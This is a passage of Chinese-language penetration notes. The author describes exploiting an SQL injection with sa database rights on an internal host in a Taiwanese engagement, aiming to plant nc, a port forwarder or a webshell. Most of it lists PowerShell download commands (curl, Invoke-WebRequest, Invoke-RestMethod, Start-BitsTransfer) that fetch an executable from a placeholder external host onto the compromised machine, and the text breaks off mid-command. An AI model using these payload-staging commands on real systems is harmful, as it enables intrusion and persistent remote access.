场景:
在过去我在做某次台湾渗透的过程中遇到了一个sql注入,数据库权限是sa权限,主机在内网无法直接登录,我们需要上传nc或者其他的转发程序将其转发出来,即便不行,我们也需要上传一个shell,但是基于没有后台的情况下,我们只能将希望寄托于sa。
应用:
Powershell
certutil
FTP
1.powershell
在windows版本中powershell支持部分linux命令。如curl,所以可以在系统支持powershell的情况下我们可以使用:
curl -O http://xxxxx/1.exe
来进行下载执行。当然还有其他的方式,powershell自带的不止curl一种,我们还可以使用:
Invoke-WebRequest
Invoke-RestMethod
Start-BitsTransfer
System.Net.WebClient
来进行下载,用法分别为:
Invoke-WebRequest -Uri http://xxxxx/1.exe -outfile 1.exe
Invoke-RestMethod -Uri http://xxxxx/1.exe -outfile 1.exe
Start-BitsTransfer -Source "http://xxxx/1.exe" -Destination "1.exe"
(new-object System.Net.We